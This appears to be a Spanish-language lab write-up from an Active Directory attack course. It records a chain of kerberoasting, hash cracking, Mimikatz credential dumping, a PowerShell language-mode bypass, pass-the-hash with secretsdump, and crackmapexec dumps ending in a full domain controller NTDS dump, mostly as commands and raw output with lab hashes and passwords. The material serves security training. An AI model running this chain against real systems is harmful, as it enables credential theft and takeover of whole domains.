Learning Objective - 7

Process using svcadmin as service account

PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2


[*] SamAccountName         : websvc
[*] DistinguishedName      : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet             : 11/14/2022 4:42:13 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast


[*] SamAccountName         : svcadmin
[*] DistinguishedName      : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet             : 11/14/2022 9:06:37 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast

[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoast

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: hashes.kerberoast
Time.Started.....: Thu Feb 22 04:26:58 2024, (1 min, 6 secs)
Time.Estimated...: Thu Feb 22 04:28:04 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Mod........: Rules (clem9669_small.rule.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   164.3 MH/s (4.97ms) @ Accel:8 Loops:128 Thr:32 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 11045180300/11045180300 (100.00%)
Rejected.........: 0/11045180300 (0.00%)
Restore.Point....: 14344390/14344390 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:384-385 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: !!sexyangel!! -> retr02301
Hardware.Mon.#1..: Temp: 62c Fan: 32% Util: 40% Core:2025MHz Mem:10251MHz Bus:16

Started: Thu Feb 22 04:26:57 2024
Stopped: Thu Feb 22 04:28:05 2024

Pero...

Entonces, como tenemos la credenciales intentamos:

crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 -x whoami
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB         172.16.4.44     445    DCORP-MGMT       [+] Executed command 
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\ciadmin

Respuesta:

sqlservr.exe

NTLM hash of svcadmin account


[dcorp-mgmt]: PS C:\> .\SafetyKatz.exe "sekurlsa::logonPasswords full" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::logonPasswords full

Authentication Id : 0 ; 132376 (00000000:00020518)
Session           : Service from 0
User Name         : svcadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:39 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1118
        msv :
         [00000003] Primary
         * Username : svcadmin
         * Domain   : dcorp
         * NTLM     : b38ff50264b74508085d82c69794a4d8
         * SHA1     : a4ad2cd4082079861214297e1cae954c906501b9
         * DPAPI    : f26ae0cc48396dccd8caa24cd33127e7
        tspkg :
        wdigest :
         * Username : svcadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : svcadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : *ThisisBlasphemyThisisMadness!!
        ssp :
        credman :

Respuesta:

b38ff50264b74508085d82c69794a4d8

NTLM hash of srvadmin extracted from dcorp-adminsrv

impacket-secretsdump -hashes ':b38ff50264b74508085d82c69794a4d8' '[email protected]'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0aa524e1204e0a68be320cc136ed76b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
dcorp\DCORP-ADMINSRV$:aes256-cts-hmac-sha1-96:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
dcorp\DCORP-ADMINSRV$:aes128-cts-hmac-sha1-96:83bfc18bd7f63a5921bf0ce2eb87755f
dcorp\DCORP-ADMINSRV$:des-cbc-md5:384552e53d8acdea
dcorp\DCORP-ADMINSRV$:plain_password_hex:51003a00680046005400270021004600550058005000360045005f003200290043004b002000640078006d00320076006c002a0027004e003e0061003b007a002d004e0049004d006f006700650069004200740048004d0074006a006700770040002c004c0078003a00590044002e003d002200350047005b0065002000200059002b0077004e0040005e00340034003e00490054004000730064005e0044007800510034004800570052005900360025003200300038003f006c005400450062005500600075002e0048003000640025007a005900490057002f006400400051006100540037005a00740064002700
dcorp\DCORP-ADMINSRV$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:0x15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM 
 0000   09 C8 7B C2 96 41 6E CB  B2 F6 1B DC 29 5C 39 76   ..{..An.....)\9v
 0010   7E A6 22 97 DC D3 BE 6B  C3 71 48 71 61 6B B2 B3   ~."....k.qHqak..
 0020   D0 D6 E0 48 F0 8B 7D 8B  8B 14 95 05 B4 21 FE 93   ...H..}......!..
 0030   28 51 47 F1 26 24 B5 F4  E4 20 B6 AC E5 90 33 02   (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP 
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv 
dcorp\appadmin:*ActuallyTheWebServer1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Verificando el LanguageMode

[dcorp-adminsrv]: PS C:\Program Files> echo '$ExecutionContext.SessionState.LanguageMode' > test.ps1
[dcorp-adminsrv]: PS C:\Program Files> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\Program Files> .\test.ps1
FullLanguage

Agregamos una linea dentro del script Invoke-Mimikatz.ps1.

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "Sekurlsa::LogonPasswords"'

Luego ejecutamos el Mimikatz y respondemos las flags.

 PS C:\Program Files> .\Invoke-Mimikatz.ps1

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

616     {0;000003e7} 1 D 16097          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00e70446} 0 D 15141446    dcorp\svcadmin  S-1-5-21-719815819-3726368948-3917688648-1118   (11g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 18044422    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # Sekurlsa::LogonPasswords

Authentication Id : 0 ; 752154 (00000000:000b7a1a)
Session           : RemoteInteractive from 2
User Name         : srvadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:45:15 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1115
        msv :
         [00000003] Primary
         * Username : srvadmin
         * Domain   : dcorp
         * NTLM     : a98e18228819e8eec3dfa33cb68b0728
         * SHA1     : f613d1bede9a620ba16ae786e242d3027809c82a
         * DPAPI    : a593cded7a622d70818fb3315264a140
        tspkg :
        wdigest :
         * Username : srvadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : srvadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 144880 (00000000:000235f0)
Session           : Service from 0
User Name         : websvc
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:06 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1114
        msv :
         [00000003] Primary
         * Username : websvc
         * Domain   : dcorp
         * NTLM     : cc098f204c5887eaa8253e7c2749156f
         * SHA1     : 36f2455c767ac9945fdc7cd276479a6a011e154b
         * DPAPI    : afa3166d71b438639f1c77118153d316
        tspkg :
        wdigest :
         * Username : websvc
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : websvc
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : AServicewhichIsNotM3@nttoBe
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DCORP-ADMINSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : dcorp-adminsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 539692 (00000000:00083c2c)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:41:47 PM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 144881 (00000000:000235f1)
Session           : Service from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:06 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117
        msv :
         [00000003] Primary
         * Username : appadmin
         * Domain   : dcorp
         * NTLM     : d549831a955fee51a43c83efb3928fa7
         * SHA1     : 07de541a289d45a577f68c512c304dfcbf9e4816
         * DPAPI    : a5d49d98574a7574ab70fa77797c367d
        tspkg :
        wdigest :
         * Username : appadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : *ActuallyTheWebServer1
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 21178 (00000000:000052ba)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 21140 (00000000:00005294)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 20080 (00000000:00004e70)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:49 PM
SID               :
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DCORP-ADMINSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:49 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : dcorp-adminsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :ls

crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 --lsa
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB         172.16.4.44     445    DCORP-MGMT       [+] Dumping LSA secrets
SMB         172.16.4.44     445    DCORP-MGMT       DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB         172.16.4.44     445    DCORP-MGMT       DOLLARCORP.MONEYCORP.LOCAL/mgmtadmin:$DCC2$10240#mgmtadmin#b51b86694af5c690d2ad019fbfc00707
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aes256-cts-hmac-sha1-96:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aes128-cts-hmac-sha1-96:0049f234ae46eba0bfb2ced5b8c8d2b4
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:des-cbc-md5:a79234f220c4549e
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:plain_password_hex:34003f0050006800430068004b005000280060003f00790057006000450038003d0056004d00320051004900310033004f00210069002a00330051003f005700560042002200580029003d003e0049006c0033003d00410063007a004a0030005e005400210058005d00720026003a002600790047003400310060002a002f0024005e0034002b00450065005a00300037003f007a00460032005a00330060003a005b004a0064002a0046002f007a005f00500060007000360042003900580048005e00670024002a006d005800490051004d00580059002800530063003f0033005c00410036004900430072005800
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB         172.16.4.44     445    DCORP-MGMT       dpapi_machinekey:0xb3084493f6af9cf8b2964ee53accccd428737b2c
dpapi_userkey:0xe46d070e975b2473e749e7927a64a61fe1575b20
SMB         172.16.4.44     445    DCORP-MGMT       NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\svcadmin:*ThisisBlasphemyThisisMadness!!
SMB         172.16.4.44     445    DCORP-MGMT       [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.secrets and /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.cached

Probamos las nuevas creds.

crackmapexec smb 172.16.4.44 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)

Obtenemos la IP del dominio.

PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> nslookup.exe dollarcorp.moneycorp.local
Server:  UnKnown
Address:  172.16.2.1

Name:    dollarcorp.moneycorp.local
Address:  172.16.2.1

Probamos las creds en el DC.

crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)

Y dumpeamos todos los hashes.

crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --sam
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping SAM hashes
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:a102ad5753f4c441e3af31c97fad86fd:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB         172.16.2.1      445    DCORP-DC         [+] Added 3 SAM hashes to the database

crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --lsa
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping LSA secrets
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aes256-cts-hmac-sha1-96:f4583f2be42c52751be1ce4e8f51c3c256c89be2b41e0b6c57c8f2cd4edadfcf
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aes128-cts-hmac-sha1-96:10715e504e5e3b6825f0a58aabd03108
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:des-cbc-md5:bc321ad310ce1ab5
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:plain_password_hex:9d2b4437a83b9f4b7038e6fdb58f506b95726a3034a92bac398a7dd61856d91ce33067a9d945f051ed1b1de95feffd32eef8481b25306953859d7242259108676568b30259b28570e0fe906928f4fcf1ae5698ae526b7c17b02a43e90b7fc2902351adc7f1bd3e8e03c0050123b1db24af4397449ebd8ea44347e68071d76a9a78b1f315229f3a2915397621d8cb968518d4937dd8ea46a988276c15a85bf0f7db00800120c318d73cdff23562b8e5d96af5754c507a760e9ba73c4ce67cb74b349f340fdd8dc9e0bac7ebd390afa440c23c8e0059de3f472359c205f7ddea65ae0efd662a35d7dc0335968eeb642886
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB         172.16.2.1      445    DCORP-DC         dpapi_machinekey:0x558f948af84f9dec3acf3499b5e9af0de2d8e803
dpapi_userkey:0xb1b020a793cbecd7d3ad7aacbc6b73f33c9e4d43
SMB         172.16.2.1      445    DCORP-DC         NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB         172.16.2.1      445    DCORP-DC         [+] Dumped 7 LSA secrets to /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.secrets and /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.cached

crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB         172.16.2.1      445    DCORP-DC         sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB         172.16.2.1      445    DCORP-DC         websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB         172.16.2.1      445    DCORP-DC         srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB         172.16.2.1      445    DCORP-DC         svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB         172.16.2.1      445    DCORP-DC         mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
SMB         172.16.2.1      445    DCORP-DC         ciadmin\ciadmin:1121:aad3b435b51404eeaad3b435b51404ee:e08253add90dccf1a208523d02998c3d:::
SMB         172.16.2.1      445    DCORP-DC         sql1admin\sql1admin:1122:aad3b435b51404eeaad3b435b51404ee:e999ae4bd06932620a1e78d2112138c6:::
SMB         172.16.2.1      445    DCORP-DC         dollarcorp.moneycorp.local\studentadmin:4181:aad3b435b51404eeaad3b435b51404ee:d1254f303421d3cdbdc4c73a5bce0201:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-DC$:1000:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-ADMINSRV$:1105:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-APPSRV$:1106:aad3b435b51404eeaad3b435b51404ee:b4cb7bf8b93c78b8051c7906bb054dc5:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-CI$:1107:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-MGMT$:1108:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-MSSQL$:1109:aad3b435b51404eeaad3b435b51404ee:b205f1ca05bedace801893d6aa5aca27:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-SQL1$:1110:aad3b435b51404eeaad3b435b51404ee:3686dfb420dc0f9635e70c6ca5875b49:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-STDADMIN$:4202:aad3b435b51404eeaad3b435b51404ee:e444bbf444732fc38065ea9e9255ab03:::
SMB         172.16.2.1      445    DCORP-DC         mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB         172.16.2.1      445    DCORP-DC         US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB         172.16.2.1      445    DCORP-DC         ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::

Respuesta:

b38ff50264b74508085d82c69794a4d8

PreviousLearning Objective - 6 NextLearning Objective - 8 y 9

Last updated 1 year ago

hashtagProcess using svcadmin as service account

hashtagNTLM hash of svcadmin account

hashtagNTLM hash of srvadmin extracted from dcorp-adminsrv

Process using svcadmin as service account

NTLM hash of svcadmin account

NTLM hash of srvadmin extracted from dcorp-adminsrv